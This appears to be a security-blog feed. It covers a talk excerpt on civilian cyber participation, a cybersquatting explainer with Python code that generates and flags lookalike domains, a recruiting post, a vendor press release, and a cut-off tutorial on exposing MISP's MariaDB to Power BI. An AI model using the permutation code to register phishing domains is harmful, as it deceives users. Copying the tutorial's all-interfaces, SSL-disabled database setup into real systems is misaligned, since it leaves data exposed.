Yeah, I mean, I think it’s a human reaction to want to take part on one of the sides of the conflict; you feel engaged in something. But on the other side, what I’m showing here is that with digitalization it is way easier to get into, and there is a lack of cognitive process. When you think, I’m going to participate, you just open the laptop and do something. It would be different if you had to go physically to the battlefield, take a gun, and participate. That barrier is what would restrain you from doing this. That’s why this is the problem of civilianization: we are bringing more and more civilians into the conflict because it is easy with digital means. And we have to think about this: okay, it’s easy, but the consequences are exactly the same as participating physically in the conflict. That’s the main message of the talk today. Thank you very much, guys.

Speaker2:
Thank you. Mauro, thank you.


About the Presenter

Mauro Vignati currently holds the role of Advisor on Digital Technologies of Warfare for the International Committee of the Red Cross (ICRC). Having worked with the Swiss Federal Department of Defense, the National Cyber Security Centre (NCSC), and now the ICRC, Mauro brings nearly two decades’ worth of expertise on the prevention, identification, and analysis of advanced persistent threats (APTs), mainly from state-sponsored groups.

About LABScon

This presentation was featured live at LABScon 2022, an immersive 3-day conference bringing together the world’s top cybersecurity minds, hosted by SentinelOne’s research arm, SentinelLabs.

What is Cybersquatting?

By: Dom Myers
9 November 2022 at 09:00

Cybersquatting is the act of registering a domain name which looks similar to a target domain in order to perform malicious activity. This includes facilitating phishing campaigns, attacking genuine visitors who mistyped an address, or damaging a brand’s reputation. This article will cover the dangers of cybersquatting, what companies can do about it, and outline a plan for a tool which can be used to detect potentially malicious domains.

Many phishing campaigns use generic domains such as discountoffers.com which can be used against any company under the guise of offering discounts or money back. This can then be expanded to use a subdomain such as acme.discountoffers.com to more precisely target a specific brand. However, other more targeted campaigns will use names similar to a legitimate one owned by the target in the hopes that a victim either won’t notice the misspelling or think that the domain is genuine. A real-world example of this was the case of Air France who own www.airfrance.com, as a cybersquatter registered www.arifrance.com and www.airfranceairlines.com to divert users to a website selling discount travel deals.

Companies spend huge amounts of money registering domains that are similar to their primary ones in an attempt to prevent them potentially being used maliciously in the future. Due to cost and logistics, it’s impossible to register every possible domain an attacker might take advantage of, and often by the time a company considers taking such a step, some domains have already been registered. In this latter case, as it’s too late for the company to register it themselves, the next best thing is to be aware of them so action can be taken accordingly.

Common Cybersquatting Techniques

There are several routes an attacker may take in order to choose a domain which is likely to be successful against their target. The following sections detail a few of the thought processes an attacker might go through when choosing a domain using “google.com” as the sample target.

Misspelling

This is when a cybercriminal registers a misspelled domain, a practice often known as typosquatting. With these domains the attacker is hoping a user will accidentally type the target name wrong. Some permutations substitute letters with ones next to them on the keyboard, or type characters in a slightly different order. Examples include:

  • googel.com
  • gogle.com
  • soogle.com

As shown below, Google has proactively registered some domains to protect their users and their trademark, redirecting them to the genuine website.

Misspelt domain redirecting to legitimate Google website

Similar looking

These are URLs which look similar to the target and although they could be mistyped by a user looking to visit the target domain, they could also be ones designed to not be typed by the victim. For example, to be used as a link in a phishing email where the attacker hopes the victim doesn’t notice due to its similarity. Techniques for this could include replacing letters with numbers, “i” with “L”, swapping letters around, etc. Examples include:

  • g00gle.com
  • googie.com
  • gooogle.com

Legitimate looking

Another potential technique is registering domains which don’t contain typos and aren’t designed to look like the target but a victim might think it genuine. This could include registering different top-level domains using the legitimate company name, or prepending/appending words to the target. Examples include:

  • googlesupport.com
  • google.net
  • google-discounts.com
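The three technique families above lend themselves to simple automation. A minimal sketch of a permutation generator is shown below; the substitution tables, affixes, and TLD list are small illustrative samples chosen for this example, not part of any particular tool:

```python
# Sketch: generate candidate cybersquatting permutations for a target domain.
# The lookup tables below are tiny illustrative samples, not exhaustive maps.

ADJACENT_KEYS = {"g": "fh", "o": "ip", "l": "k"}  # small sample of a QWERTY map
LOOKALIKES = {"o": "0", "i": "l", "l": "i"}       # visually similar characters
AFFIXES = ["support", "login", "-discounts"]      # legitimate-looking add-ons
TLDS = ["net", "org", "co"]

def permutations(domain):
    name, _, tld = domain.partition(".")
    results = set()

    # Misspellings: omissions, repetitions, transpositions, adjacent-key typos
    for i in range(len(name)):
        results.add(name[:i] + name[i + 1:] + "." + tld)        # omission
        results.add(name[:i] + name[i] + name[i:] + "." + tld)  # repetition
        if i < len(name) - 1:                                   # transposition
            results.add(name[:i] + name[i + 1] + name[i] + name[i + 2:] + "." + tld)
        for key in ADJACENT_KEYS.get(name[i], ""):
            results.add(name[:i] + key + name[i + 1:] + "." + tld)

    # Similar-looking: single-character substitutions such as o -> 0
    for i, ch in enumerate(name):
        if ch in LOOKALIKES:
            results.add(name[:i] + LOOKALIKES[ch] + name[i + 1:] + "." + tld)

    # Legitimate-looking: alternate TLDs and appended words
    results.update(name + "." + t for t in TLDS)
    results.update(name + suffix + "." + tld for suffix in AFFIXES)

    results.discard(domain)  # a transposition of "oo" recreates the original
    return results

candidates = permutations("google.com")
```

Running this against google.com reproduces several of the examples above (gogle.com, googel.com, gooogle.com, google.net, googlesupport.com); a real generator would use full keyboard-adjacency and homoglyph tables and more affixes.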

What can I do if someone registers my domain?

So you have identified a list of similar domains to yours. You’ve investigated and found that one of the domains has mirrored your own website and is being used to launch phishing campaigns against your employees. What do you do now?

In the United States there are two avenues for legal action:

  • Internet Corporation for Assigned Names and Numbers (ICANN)
  • Anticybersquatting Consumer Protection Act (ACPA)

ICANN Procedure

ICANN has developed the Uniform Domain-Name Dispute-Resolution Policy (UDRP) to resolve disputes over domains which may infringe on trademark claims. A complainant can bring an action by asserting that:

  • A domain name is identical or confusingly similar to a trademark or service mark in which the complainant has rights; and
  • The domain owner has no rights or legitimate interests in respect of the domain name; and
  • The domain name has been registered and is being used in bad faith.

If the action is successful, the domain will either be cancelled or transferred to you.

Legal Action Under the ACPA

The Anticybersquatting Consumer Protection Act (ACPA) was enacted in 1999 in order to combat cybersquatting such as the case described in this article. A trademark owner may bring an action against a squatter who:

  • Has a bad faith intent to profit from the trademark
  • Registers, traffics in, or uses a domain name that is
    • Identical or confusingly similar to a distinctive trademark
    • Identical or confusingly similar to or dilutive of a famous trademark
    • Otherwise a trademark protected by statute

A UDRP proceeding is generally the more advisable course of action, as it tends to be faster and cheaper.

User awareness and technical solutions

As these proceedings can be time consuming (or if your business is based outside of the United States), more immediate measures can be taken to at least protect a client’s own internal users. Making employees aware of a new phishing site is one of the quickest and easiest steps that can be taken to help them stay on the lookout and reduce the chance of success for the attacker.

In addition to this, email policies can be set up to block incoming emails from these potential phishing domains so that they never reach employees in the first place. Some determined attackers may attempt to get round this by contacting employees via another medium such as telephone, coercing victims to visit their site manually via a web browser. In these cases, networking solutions may be able to help to prevent users from connecting to these malicious domains at all by blocking them at the firewall level.

Conclusion

Cybersquatting is a threat which is often overlooked, and many companies either don’t consider protection until they’ve been affected by it, or believe it’s something they aren’t able to proactively defend against. Nettitude are aiming to assist clients further in this area by developing tools which allow domains to be continuously monitored for potentially suspicious permutations.
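One way such continuous monitoring could work is sketched below: compare each newly observed domain against the protected name and flag those within a small edit distance. This is a simplified illustration with a placeholder threshold and feed, not Nettitude’s actual tooling:

```python
# Sketch: flag newly observed domains close to a protected domain.
# The threshold and the sample feed are illustrative assumptions.

def edit_distance(a, b):
    """Classic Levenshtein distance via dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        cur = [i]
        for j, cb in enumerate(b, start=1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]

def suspicious(new_domains, protected, threshold=2):
    """Return domains whose name part is within `threshold` edits of the
    protected name (including exact matches on a different TLD)."""
    name = protected.split(".")[0]
    return [d for d in new_domains
            if d != protected and edit_distance(d.split(".")[0], name) <= threshold]

# Sample feed of newly registered domains (illustrative)
feed = ["arifrance.com", "airfrance.net", "example.com", "airfrance.com"]
flagged = suspicious(feed, "airfrance.com")
```

With the Air France example from earlier, arifrance.com (two substitutions) and airfrance.net (same name, different TLD) are flagged, while unrelated names pass through; a production monitor would also fold in the permutation-generation and homoglyph checks described above.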

The post What is Cybersquatting? appeared first on Nettitude Labs.

Recruiting Security Researchers Remotely

8 November 2022 at 23:00

At Doyensec, the application security engineer recruitment process is 100% remote. As the final step, we used to organize an onsite interview in Warsaw for candidates from Europe and in New York for candidates from the US. It was like that until 2020, when the Covid pandemic forced us to switch to a 100% remote recruitment model and hire people without meeting them in person.

Banner Recruiting Post

We have conducted recruitment interviews with candidates from over 25 countries. So how did we build a process that, on the one hand, is inclusive for people of different nationalities and cultures, and on the other hand, allows us to understand the technical skills of a given candidate?

The recruitment process below is the result of the experience gathered since 2018.

Introduction Call

Before we start the recruitment process of a given candidate, we want to get to know someone better. We want to understand their motivations for changing the workplace as well as what they want to do in the next few years. Doyensec only employs people with a specific mindset, so it is crucial for us to get to know someone before asking them to present their technical skills.

During our initial conversation, our HR specialist will tell a candidate more about the company, how we work, where our clients come from and the general principles of cooperation with us. We will also leave time for the candidate so that they can ask any questions they want.

What do we pay attention to during the introduction call?

  • Knowledge of the English language for applicants who are not native speakers
  • Professionalism - although people come from different cultures, professionalism is international
  • Professional experience that indicates the candidate has the background to be successful in the relevant role with us
  • General character traits that can tell us if someone will fit in well with our team

If the financial expectations of the candidate are in line with what we can offer and we feel good about the candidate, we will proceed to the first technical skills test.

Source Code Challenge

At Doyensec, we frequently deal with source code that is provided by our clients. We like to combine source code analysis with dynamic testing. We believe this combination will bring the highest ROI to our customers. This is why we require each candidate to be able to analyze application source code.

Our source code challenge is arranged such that, at the agreed time, we send an archive of source code to the candidate and ask them to find as many vulnerabilities as possible within 2 hours. They are also asked to prepare short descriptions of these vulnerabilities according to the instructions that we send along with the challenge. The aim of this assignment is to understand how well the candidate can analyze the source code and also how efficiently they can work under time pressure.

We do not reveal in advance what programming languages are in our tests, but they should expect the more popular ones. We don’t test on niche languages as our goal is to check if they are able to find vulnerabilities in real-world code, not to try to stump them with trivia or esoteric challenges.

We feel nothing beats real-world experience in coding and reviewing code for vulnerabilities. Beyond that, the academic knowledge necessary to pass our code review challenge is similar (but not limited) to what you’d find in the following resources:

Technical Interview

After analyzing the results of the first challenge, we decide whether to invite the candidate to the first technical interview. The interview is usually conducted by our Consulting Director or one of the more experienced consultants.

The interview will last about 45 minutes where we will ask questions that will help us understand the candidates’ skillsets and determine their level of seniority. During this conversation, we will also ask about mistakes made during the source code challenge. We want to understand why someone may have reported a vulnerability when it is not there or perhaps why someone missed a particular, easy to detect vulnerability.

We also encourage candidates to ask questions about how we work, what tools and techniques we use and anything else that may interest the candidate.

The knowledge necessary to be successful in this phase of the process comes from real-world experience, coupled with academic knowledge from sources such as these:

Web Challenge

At four hours in length, our Web Challenge is our last and longest test of technical skills. At an agreed upon time, we send the candidate a link to a web application that contains a certain number of vulnerabilities and the candidate’s task is to find as many vulnerabilities as possible and prepare a simplified report. Unlike the previous technical challenge where we checked the ability to read the source code, this is a 100% blackbox test.

We recommend that candidates feel comfortable with topics similar to those covered in the Portswigger Web Security Academy, or the training/CTFs available through sites such as HackerOne, prior to attempting this challenge.

If the candidate passes this stage of the recruitment process, they will only have one last stage, an interview with the founders of the company.

Final Interview

The last stage of recruitment isn’t so much an interview but rather, more of a summary of the entire process. We want to talk to the candidate about their strengths, better understand their technical weaknesses and any mistakes they made during the previous steps in the process. In particular, we always like to distinguish errors that come from the lack of knowledge versus the result of time pressure. It’s a very positive sign when candidates who reach this stage have reflected upon the process and taken steps to improve in any areas they felt less comfortable with.

The last interview is always carried out by one of the founders of the company, so it’s a great opportunity to learn more about Doyensec. If someone reaches this stage of the recruitment process, it is highly likely that our company will make them an offer. Our offers are based on their expectations as well as what value they bring to the organization. The entire recruitment process is meant to guarantee that the employee will be satisfied with the work and meet the high standards Doyensec has for its team.

The entire recruitment process takes about 8 hours of actual time, which is only one working day, total. So, if the candidate is reactive, the entire recruitment process can usually be completed in about 2 weeks or less.

If you are looking for more information about working @Doyensec, visit our career page and check out our job openings.

Summary Recruiting Process

NVISO EXCELS IN MITRE ATT&CK® MANAGED SERVICES EVALUATION

9 November 2022 at 14:13

As one of the only EU-based Cyber Security companies, NVISO successfully participated in a first-of-its-kind, MITRE-led, evaluation of Managed Security Services (MSS).

MITRE Evaluation Graphic


The inaugural MITRE Engenuity ATT&CK® Evaluations for Managed Security Services ran in June 2022 and its results have been published today. NVISO performed excellently in the evaluation, demonstrating services that are at or above the level of traditional titans of the industry.


During this evaluation, NVISO was tested on its ability to detect and report advanced attacks that were executed by the MITRE team.

“The tests were simulating real-life scenarios in which only detection and reporting was evaluated – we were not allowed to block or respond to any attacks”, says Erik Van Buggenhout, Partner, responsible for Managed Security Services at NVISO. A test environment was set up in which participants would deploy their tools and detection services.

“NVISO chose to deploy Palo Alto’s Cortex XDR – an XDR tool that integrates seamlessly into our service and client environments. The combination of XDR with our NITRO automation platform and NVISO world-class expertise ensures that our Managed Detection and Response service is top notch and future-proof. While we have always believed in our own strategy, we are excited and proud to receive MITRE’s external and independent validation of the outstanding quality of our services.”, Erik says.

NVISO was one of the only EU-based Cyber Security companies participating in this elite evaluation. “NVISO is a true European Cyber Security company, which is reflected well in its mission: to safeguard the foundations of European society from cyber attacks”, says Maxim Deweerdt, head of MSS presales at NVISO.

NVISO was founded in 2013 in Belgium and has since offered services to large and mid-sized customers in almost 20 countries, mostly in Europe. NVISO has offices in Brussels, Frankfurt, Munich, Vienna and Athens. “The way NVISO approaches Managed Detection and Response is typical for our company: we challenge the status quo and provide an innovative approach driven by our expertise and long experience in cyber defense”, Maxim says. “This evaluation has highlighted and validated our approach, and confirms the positive feedback we receive from customers”.


More information about the evaluation and NVISO’s services can be found here: https://mitre.nviso.eu

About MITRE

MITRE Engenuity is a US nonprofit organization launched in 2019 in collaboration with corporate partners “to collaborate with the private sector on solving industry-wide problems with cyber defense”. They are best known in the Cyber Security world for their work on the ATT&CK® framework, a global knowledge base of threat activity, techniques and models. The ATT&CK® framework is used by almost every vendor and provider in the Cyber Defense industry.

www.mitre-engenuity.org

About NVISO

NVISO is a pure-play Cyber Security company founded in 2013 in Brussels by 5 ex-Big Four managers who always had an itch to do things differently (and better) and decided to start their own company with a strong mission: to safeguard the foundations of European society from cyber attacks. NVISO currently employs about 200 people and has offices in Brussels, Frankfurt, Munich, Vienna and Athens. NVISO is rapidly expanding into other countries and has an aggressive growth strategy for the coming years. NVISO has customers in 20+ countries, primarily in the Finance, Government, Defense, and Technology sectors.

www.nviso.eu



Visualizing MISP Threat Intelligence in Power BI – An NVISO TI Tutorial

9 November 2022 at 13:42
MISP Power BI Dashboard

Problem Statement

Picture this. You are standing up your shiny new MISP instance to start to fulfill some of the primary intelligence requirements that you gathered via interviews with various stakeholders around the company. You get to some requirements that are looking for information to be captured in a visualization, preferably in an automated and constantly updating dashboard that the stakeholder can look into at their leisure.

Well, MISP was not really made for that. There is the MISP-Dashboard repo, but that is not quite what we need. Since we want to share the information, combine it with other data sources, and make custom visualizations, we need something more flexible and linked to the other services and applications the organization uses. It also looks as if other stakeholders would like to compare and contrast their datasets with those of the TI program. Then you think: it would be nice to be able to display all the work that went into populating the MISP instance and show value over time. How the heck are we going to solve all of these problems with one solution which doesn’t cost a fortune???

Links to review:

CTIS-2022 Conference talk – MISP to PowerBI: https://youtu.be/0i7_gn1DfJU
MISP-Dashboard powered by ZMQ: https://github.com/MISP/misp-dashboard

Proposed Solution

Enter this idea = “Making your data (and yourself/your team) look amazing with Power BI!”

In this blog we will explain how to use the functionality of Power BI to accomplish all of these requirements. Along the way you will probably come up with other ideas around data analytics that go beyond just the TI data in your MISP instance. Having all this data in a platform that allows you to slice and dice it without messing with the original source is truly game changing.

What is MISP???

If you do not know what MISP is, I prepped this small section.

MISP is a Threat Intelligence Sharing Platform that is now community driven. You can read more about its history here: https://www.misp-project.org/

In a nutshell, MISP is a platform that allows you to capture, generate, and share threat intelligence in a structured way. It also helps control access to the data that the user and organization is supposed to be able to access. It uses MariaDB as its back-end database. MariaDB is a fork of MySQL. This makes it a prime candidate for using Power BI to analyze the data.

What is Power BI???

Power BI is a set of products and services offered by Microsoft to enable users to centralize Business Intelligence (BI) data with all the tools to analyze and visualize it. Other applications and services that are similar to Power BI are Tableau, MicroStrategy, etc.

Power BI Desktop

  • Desktop application
  • Complete data analysis solution
  • Includes Power Query Editor (ETLs)
  • Can upload data and reports to the Power BI service
  • Can share reports and templates manually with other Power BI Desktop users
  • Free (as in beer), runs on modern Windows systems

Power BI Service

  • Cloud solution
  • Can link visuals in reports to dashboards (scheduled data syncs)
  • Used for collaboration and sharing
  • Limited data modelling capabilities
  • Not Free (Pro license level included with Microsoft E5 license, per individual licenses available as well)

Links to Pricing

More information here: https://docs.microsoft.com/en-gb/power-bi/fundamentals/power-bi-overview and https://powerbi.microsoft.com/en-au/pricing/

Making the MISP MariaDB accessible to Power BI Desktop

MISP uses MariaDB which is a fork of MySQL. These terms are used interchangeably during this blog. You can use MariaDB or MySQL on the command line. I will use MySQL in this blog for conciseness.

Adding a Power BI user to MariaDB

When creating your MISP instance, you create a root user for the MariaDB service. Log in with that user to create a new user that can read the MISP database.

mysql -u root -p
# List users
SELECT User, Host FROM mysql.user;
# Create new user
CREATE USER 'powerbi'@'%' IDENTIFIED BY '<insert_strong_password>';
GRANT SELECT ON misp.* TO 'powerbi'@'%';
FLUSH PRIVILEGES;
# List users again to verify
SELECT User, Host FROM mysql.user;
# Close mysql terminal
exit

Configuring MariaDB to Listen on External Interface

We need to make the database service accessible outside of the MISP instance. By default it listens only on 127.0.0.1

sudo netstat -tunlp
# You should see that mysqld is listening on 127.0.0.1:3306

# Running the command below is helpful if you do not know what locations are being read for configuration information by mysql
mysql --help | grep "Default options" -A 1

# Open the MariaDB config file below as it is the one that is being used by default in normal MISP installs.
sudo vim /etc/mysql/mariadb.conf.d/50-server.cnf

# I will not go into how to use vim as you can use the text editor of your choice. (There are strong feelings here....)
# Add the following lines in the [mysqld] section:

skip-networking=0
skip-bind-address

# Comment out the bind-address line with a # 
#bind-address

# Should look like this when you are done: #bind-address            = 127.0.0.1
# Then save the file

# Restart the MariaDB service
sudo service mysql restart

# List all the listening services again to validate our changes. 
sudo netstat -tunlp
# You should see the mysqld service now listening on 0.0.0.0:3306

Optional: Setup Firewall Rules to Control Access (recommended)

To maintain security we can add host-based firewall rules to ensure only our selected IPs or network ranges are allowed to connect to this service. If you are in a local environment, behind a VPN, etc., then this step might not be necessary. Below is a quick command to enable UFW on Ubuntu and allow all the ports needed for MISP, MySQL, and for maintenance via SSH.

# Switch to root for simplicity
sudo su -

# Show current status
ufw status

# Set default rules
ufw default deny incoming
ufw default allow outgoing

# Add your trusted network range or specific IPs for the ports below. If there are additional services you need to allow connections to you can add them in the same manner. Example would be SNMP. Also if you are using an alternate port for SSH, make sure you update that below or you will be cut off from your server. 
ufw allow from 10.0.0.0/8 to any port 22,80,443,3306 proto tcp

# Show new rules listed by number
ufw status numbered

# Start the firewall
ufw enable

For more information on UFW, I suggest the Digital Ocean tutorials.

You can find a good one here: https://www.digitalocean.com/community/tutorials/how-to-set-up-a-firewall-with-ufw-on-ubuntu-20-04
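Before moving on to Workbench, a quick reachability check from the analyst workstation can confirm that the bind-address and firewall changes took effect. A minimal sketch using only the Python standard library (the host IP below is a placeholder for your MISP server):

```python
# Sketch: verify that the MariaDB port on the MISP server is reachable
# before configuring MySQL Workbench or Power BI. Host is a placeholder.
import socket

def port_open(host, port, timeout=3.0):
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

if __name__ == "__main__":
    host = "10.0.0.5"  # placeholder: replace with your MISP server IP
    if port_open(host, 3306, timeout=1.0):
        print("MariaDB port reachable - proceed with Workbench / Power BI setup")
    else:
        print("Cannot reach 3306 - re-check bind-address, UFW rules, and routing")
```

If this reports the port as unreachable, revisit the 50-server.cnf changes and the UFW rules above before blaming the client-side drivers.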

Testing Access from Remote System with MySQL Workbench

Having a tool to test and work with MySQL databases is crucial for testing in my opinion. I use the official “MySQL Workbench” that can be found at the link below:
https://dev.mysql.com/downloads/workbench/

You can follow the documentation here on how to use the tool and create a connection: https://dev.mysql.com/doc/workbench/en/wb-mysql-connections-new.html

Newer versions of the Workbench try to enforce connections to databases over SSL/TLS for security reasons. By default, the database connection in use by MISP does not have encryption configured. It is also out of the scope of this article to set this up. To get around this, you can add useSSL=0 to the “Others” text box in the Advanced tab of the connection entry for your MISP server. When you test the connection, you will receive a pop-up warning about incompatibility. Proceed and you should have a successful test.

MySql Workbench Settings

Once the test is complete, close the create connection dialog. You can then click on the connection block in Workbench and you should be shown a screen similar to the one below. If so, congratulations! You have set up your MISP instance database to be queried remotely.

MySQL Workbench Data Example

Installing Power BI Desktop and MySQL Drivers

Oracle MySQL Connector

For Power BI Desktop to connect to the MySQL server you will need to install a “connector” which tells Power BI how to communicate with the database. Information on this process is found here: https://docs.microsoft.com/en-us/power-query/connectors/mysqldatabase
The “connector” itself can be downloaded from here: https://dev.mysql.com/downloads/connector/net/

You will have to create a free Oracle account to be able to download the software.

Test Access from Power BI Desktop to MISP MariaDB

Once installed, you will be able to select MySQL from the “Get data” button in the ribbon in the Data section of the Home tab. (Or the splash screen that pops up each time you load Power BI Desktop, hate that thing. I swear I have unchecked the “Show this screen on startup” but it doesn’t care. I digress.)

Do not get distracted by the amount of datatypes you can connect to Power BI. This is where the nerd rabbit hole begins. FOCUS!

  1. Click on Get data
  2. Click on More…
  3. Wait for it to load
  4. Type “MySQL” in the search box
  5. Select MySQL database from the panel to the right
  6. Click Connect
Selecting Data Type
  1. Setup IP address and port in the Server field for your MISP instance
  2. Type misp in the Database field
  3. Click OK
Configure MISP Connection Information
  1. Select Database for the credential type
  2. Enter the user we created and the password
  3. Select the database level in the “Select which level to apply these settings to” drop-down menu
  4. Click Connect
Connecting to the MISP MariaDB Service

View your data in all its glory!

If you get an error such as “An error happened while reading data from the provider: ‘Character set ‘utf8mb3’ is not supported by .NET Framework.’”, do not worry. Just install the latest version of the .NET Framework and the latest MySQL Connector for .NET. This should fix any issues you are having.

You can close the window; Power BI will remember and store the connection information for next time.

If you cannot authenticate or connect, recheck your username and password and confirm that you can reach the MISP server on port 3306 from the device that you are running Power BI Desktop on. Also, make sure you are using Database for the authentication type and not Windows Auth.
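If name resolution and firewall rules are in doubt, a quick way to verify raw reachability of the database port from the Power BI machine is a short Python check (a sketch; the host value is a placeholder you should replace with your MISP server's IP):

```python
import socket

def port_open(host: str, port: int, timeout: float = 3.0) -> bool:
    # Returns True if a TCP connection to host:port succeeds within the timeout.
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Replace with your MISP server IP; 3306 is the default MySQL/MariaDB port.
print(port_open("127.0.0.1", 3306))
```

If this prints False, the problem is connectivity (firewall, bind address, routing) rather than credentials.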

Create a save file so that we can start working on our data ingest transforms and manage the relationships between the various tables in the MISP schema.

  1. Select File
  2. Save As
  3. Select the location where you will save the local copy of your Power BI report.
  4. Click Save

Now, we have a blank report file and pre-configured data source. Awesomeness!

Power Query Transforms (ETL Process)

ETL: extract, transform, load. Look it up. Big money in the data analytics space by the way.

So, let’s get into looking at the data and making sure it is in the right format for our purposes. If you closed Power BI Desktop, open it back up. Once loaded, click on File and then Open report, and select the report you saved earlier. So, we have a nice and empty workspace. Let’s fix that!

In the Ribbon, click on Recent sources and select the source we created earlier. You should be presented with Navigator and a list of tables under the misp schema.

Selecting Tables in Power BI Desktop

Load all of the tables we want to use for visualizations later. In my experience, it helps to do this all at once instead of trying to add additional tables at a later date.

Select the tables in the next subsection, Recommended Tables, and click Load. This could take a while if your MISP instance has a lot of Events and Attributes in it. Power BI will create a local copy of the database so that you can build your reports accurately; you can then refresh this local copy when needed. We will talk about data refresh later as well.

Do not try to transform the data at this step, especially if your MISP instance has a lot of data in it. We will do the transforms in a later step.

Data Importing Into Power BI Desktop

Recommended Tables

  • misp.attribute_tags
  • misp.attributes
  • misp.event_blocklists
  • misp.event_tags
  • misp.events
  • misp.galaxies
  • misp.galaxy_clusters
  • misp.galaxy_elements
  • misp.object_references
  • misp.objects
  • misp.org_blocklists
  • misp.organisations
  • misp.over_correlating_values
  • misp.sightings
  • misp.tags
  • misp.warninglist_entries
  • misp.warninglists

As you will see in the table selection dialog box, there are a lot of tables to choose from and we need most of them so that we can do drill downs, filters, etc. Do be careful if you decide to pull in tables like misp.users, misp.auth_keys, or misp.rest_client_histories, etc. These tables can contain sensitive data such as API keys and hashed passwords.

Column Data Types and Transforming Timestamps

Now, let’s start cleaning the data up for our purposes.

We are going to use Power Query for this. To open the Power Query Editor, look in the Ribbon for the Transform data button in the Queries section.

Transform Data Button

Click this and it will open the Power Query Editor window.

We will start with the first table in the Queries list on the left, misp attribute_tags. There are not many columns in this table, but it will help us go over some terminology.

Power Query

As shown in the screenshot above, Power BI has done some classification of data types in the initial ingest. We have four numeric columns and one boolean column. All of this looks to be correct and usable in this state. Let’s move on to a table that needs some work.

The very next table, misp attributes, needs some work. There are a lot more rows and columns in this table; in fact, it is probably the biggest table in MISP bar the correlations table, which is one reason we did not import that one.

At first glance, nothing seems to be amiss; that is until we scroll to the right and see the timestamp column.

Power Query Epoch Timestamp

If you recognize this long number, tip of the hat to you. If not, this is a UNIX timestamp, also known as an epoch timestamp. It is the duration of time since the UNIX epoch, which is January 1st, 1970 at 00:00:00 UTC. While this works fine in programs such as PHP, which powers MISP, projects such as Power BI need human-readable timestamp formats AND SO DO WE! So let’s make that happen.
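As a quick sanity check outside Power BI, the epoch arithmetic described above can be sketched in Python (the sample values are mine, just to illustrate the conversion the transform will perform):

```python
from datetime import datetime, timedelta, timezone

def epoch_to_datetime(ts: int) -> datetime:
    # Same arithmetic as the Power Query M transform:
    # #datetime(1970,1,1,0,0,0) + #duration(0,0,0,ts)
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=ts)

print(epoch_to_datetime(0))           # 1970-01-01 00:00:00+00:00
print(epoch_to_datetime(1667260800))  # 2022-11-01 00:00:00+00:00
```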

What we are going to do is a one-step transform. This will remove the epoch timestamp column and replace it with a human-readable timestamp column that we can understand and so can the visualization filters of Power BI. This will give you the ability to filter by month, year, quarter, etc.

Power BI uses two languages: DAX and Power Query M. We will mainly be using Power Query M for this transformation work; DAX is used for data analysis, calculations, etc.

https://docs.microsoft.com/en-us/dax/dax-overview
https://docs.microsoft.com/en-us/powerquery-m/m-spec-introduction

Using Power Query M, we are going to transform the timestamp column by calculating the duration since the epoch. So let’s do this with the timestamp column of the misp attributes table.

To shortcut some of the code creation, we are going to use a built-in Transform called Extract Text After Delimiter. Select the Transform tab from the ribbon and then select Extract in the Text Column section of the ribbon. In the drop-down menu select Text After Delimiter. Enter any character in the Delimiter text field. I am going to use “1”. This will create the following code in the formula bar:

= Table.TransformColumns(#"Extract Text After Delimiter", {{"timestamp", each Text.AfterDelimiter(Text.From(_, "en-US"), "1"), type text}})
Formula Example

We are going to alter this command to get the result we want. Starting at the “(” sign, replace everything with:

misp_attributes, {{"timestamp", each #datetime(1970,1,1,0,0,0) +#duration(0,0,0,_), type datetime}})

Your formula bar should look like this:

= Table.TransformColumns(misp_attributes, {{"timestamp", each #datetime(1970,1,1,0,0,0) +#duration(0,0,0,_), type datetime}})

And your column should have changed to a datetime type (little calendar/clock icon) and should be displaying human-readable values like in the screenshot below.

Timestamp Transformed

Do this with every epoch timestamp column you come across, for all the tables. Make sure the epoch timestamp column is already of numeric type. If it is text, you can use the code block below to change it to numeric in the same step, or add a type-change step and then perform the transform as above.

# Change <table_name> to the name of the table you are working on.
= Table.TransformColumns(<table_name>, {{"timestamp", each #datetime(1970,1,1,0,0,0) +#duration(0,0,0,Number.From(_)), type datetime}})

If there are empty, 0, or null cells in your column then you can use the Power Query M (code/macro) command below and alter it as needed. Example of this would be the sighting_timestamp column or the first_seen and last_seen columns:

# Change <table_name> to the name of the table you are working on.
= Table.TransformColumns(<table_name>, {{"first_seen", each if _ = null then null else if _ = 0 then 0 else #datetime(1970,1,1,0,0,0) +#duration(0,0,0,_), type datetime}})

Using the last code block above that handles null and 0 values is probably the best bet overall so that you do not have errors when you encounter a cell that should have a timestamp but does not.

It is recommended to remove the first_seen and last_seen columns on the Attribute table as well. They are rarely used and cause more issues and errors than they are worth. This is done in Power Query by right-clicking on the column name and selecting “Remove”.

Also, remember to SAVE as you work. In the top left you will see the classic Save icon. This will trigger a pop-up saying that you have transforms that need to be applied. Approve this, as you will have to before it saves. This will apply your new transforms to the dataset. With the attributes table, this may take a minute. Grab a coffee, we will wait…

Move on to the next table and so on. There is a lot of work up front with this ETL workflow, but the upkeep is usually minimal after the initial cleanup. Only additional fields or changes to the source data would be a reason to revisit these steps after they are complete. Enter the whole change control discussion and proper release notes on products and ….. OKAY, moving on.

There may be an error in a field or two, but usually it is okay. Power Query Editor will save any errors in a folder that you can review as needed.

Loading Tables With Transforms

Other Transforms

While you are doing the timestamp corrections on your tables, you may notice that there are other fields that could benefit from some alteration to make it easier to group, filter, etc. I will discuss some of them here, but of course you may find others; this is not an exhaustive list by any means.

Splitting Tags

So now that we have gone through each table and fixed all the timestamps, we can move on to other columns that might need adjustments. Our example will be the “misp tags” table. Navigate to the Power Query Editor again and select this table.

MISP Tags ETL

Look at the name column in the misp.tags table. From personal experience, there may come a time when you only want to display or filter on just the value of the tag and not the full tag name. We will split this string into its parts and also keep the original. Then we can do what we want with it.

Select the “name” column then in the Ribbon click the Add Column tab. Then click Extract, Text Between Delimiters. For the delimiter use a colon “:”. This will create a new column on the far right. Here is the formula that was auto-generated and creates the new column:

= Table.AddColumn(misp_tags, "Text After Delimiter", each Text.AfterDelimiter([name], ":"), type text)

